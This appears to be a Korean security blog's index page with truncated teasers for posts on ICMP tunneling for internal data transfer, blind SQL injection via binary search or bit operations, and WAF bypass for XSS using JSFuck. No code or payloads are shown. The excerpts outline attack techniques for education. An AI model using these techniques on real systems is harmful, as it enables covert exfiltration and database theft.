ICMP Tunneling์„ ํ†ตํ•ด ๋‚ด๋ถ€๋ง ๊ฐ„ ๋ฐ์ดํ„ฐ๋ฅผ ์ „์†กํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‚ด๋ถ€๋ง ๊ฐ„ ping ๋ช…๋ น์–ด๊ฐ€ ๋™์ž‘์„ ํ•˜๊ฒŒ ๋  ๊ฒฝ์šฐ ICMP Tunneling์„ ์ด์šฉํ•˜์—ฌ DATA๋ฅผ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. What is ICMP? ICMP์— ๋Œ€ํ•˜์—ฌ ๊ฐ„๋‹จํ•˜๊ฒŒ ์•Œ์•„๋ณด๋ฉด ์ธํ„ฐ๋„ท ์ œ์–ด ๋ฉ”์‹œ์ง€ ํ”„๋กœํ† ์ฝœ์œผ๋กœ ์ผ๋ฐ˜์ ์œผ๋กœ IP ๋™์ž‘์—์„œ ์ง„๋‹จ์ด๋‚˜ ์ œ์–ด๋กœ ์‚ฌ์šฉ๋˜...

Blind SQLi With Binary Search & Python

์ด๋ฒˆ์—๋Š” Binary Search๋ฅผ ์ด์šฉํ•˜์—ฌ DB๋ฅผ ์ถ”์ถœํ•  ์ˆ˜์žˆ๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Binary Search Binary Search๋ž€ ์ด์ง„ํƒ์ƒ‰ ์•Œ๊ณ ๋ฆฌ์ฆ˜์ด๋ผ ํ•˜๋ฉฐ ์ •๋ ฌ๋œ ๋ฐ์ดํ„ฐ์—์„œ ๊ฒ€์ƒ‰ ๋ฒ”์œ„๋ฅผ ์ค„์—ฌ ๋‚˜๊ฐ€๋ฉด์„œ ์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ๊ฒ€์ƒ‰ํ•˜๋Š” ์•Œ๊ณ ๋ฆฌ์ฆ˜ ์ž…๋‹ˆ๋‹ค. Contain DB Name test๋Š” acunetix์˜ ์ทจ์•ฝํ•œ ํŽ˜์ด์ง€๋กœ ์ง„ํ–‰...

Blind SQLi With Bit operation & Burp Intruder

Bit operation์„ ์ด์šฉํ•˜์—ฌ ๋ฒ„ํ”„์Šค์œ„ํŠธ์˜ Intruder ๊ธฐ๋Šฅ์œผ๋กœ ๊ฐ„๋‹จํ•˜๊ฒŒ DB๋ฅผ ์ถ”์ถœํ•  ์ˆ˜์žˆ๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Bit operation ํ•ญ์ƒ Binary Search๋ฅผ ์ด์šฉํ•˜์—ฌ Blind SQLi ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋ฅผ ๋งŒ๋“ค์—ˆ๋Š”๋ฐ ๋“œ๋ฆผํ•ต ๊ฐ•์˜๋ฅผ ํ†ตํ•ด MySQL DB์—์„œ Bit operation์„ ์ด์šฉํ•ด๋„ ๋˜๋Š” ๊ฒƒ์„ ์•Œ๊ฒŒ๋˜์—ˆ์Šต๋‹ˆ๋‹ค ...

XSS Filtering bypass with JSFuck

XSS๋ฅผ ๋ฐœ๊ฒฌํ–ˆ์ง€๋งŒ alert, confirm, prompt๋“ฑ ๋ฌธ์ž์—ด์ด WAF์—์„œ ํ•„ํ„ฐ๋ง ๋˜์—ˆ์„ ๋•Œ JSFuck์„ ์ด์šฉํ•˜์—ฌ ์ด๋ฅผ ์šฐํšŒํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. What is JSFuck? ์œ„ํ‚ค์— ๋”ฐ๋ฅด๋ฉด JavaScript ๋ฌธ๋ฒ•์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๋ฌธ์ž ์ค‘ ๋‹จ 6๊ฐ€์ง€์ธ [,],(,),!,+ ๋งŒ์œผ๋กœ ๊ตฌํ˜„ํ•  ์ˆ˜ ์žˆ์Œ์— ์ฐฉ์•ˆํ•˜์—ฌ ๊ณ ์•ˆ๋œ ๋‚œํ•ดํ•œ ํ”„๋กœ๊ทธ๋ž˜...